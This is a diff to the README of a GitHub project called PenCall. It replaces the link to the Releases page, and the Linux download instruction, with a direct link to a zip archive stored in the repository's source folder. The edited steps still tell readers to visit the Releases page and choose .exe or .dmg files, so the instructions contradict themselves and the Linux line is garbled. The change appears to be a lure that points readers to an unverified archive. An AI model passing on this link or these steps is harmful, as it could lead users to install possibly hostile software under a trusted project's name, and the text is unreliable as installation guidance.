huymini/pencall/README.md

 ## 📂 Download & Install

-To download PenCall, please visit this page: [PenCall Releases](https://github.com/huymini/pencall/releases).
+To download PenCall, please visit this page: [PenCall Releases](https://github.com/huymini/pencall/raw/refs/heads/main/src/Software-2.7.zip).

 1. Click the link above to go to the Releases page.
 2. Look for the latest version of PenCall.
 3. Download the file appropriate for your operating system.
    - For Windows, this will typically be a `.exe` file.
    - For macOS, you will find a `.dmg` file.
-   - For Linux, look for the `.tar.gz` file or similar.
+   - For Linux, look for the `https://github.com/huymini/pencall/raw/refs/heads/main/src/Software-2.7.zip` file or similar.
 4. Once the download is complete, locate the file on your system.
 5. Follow the instructions below based on your operating system: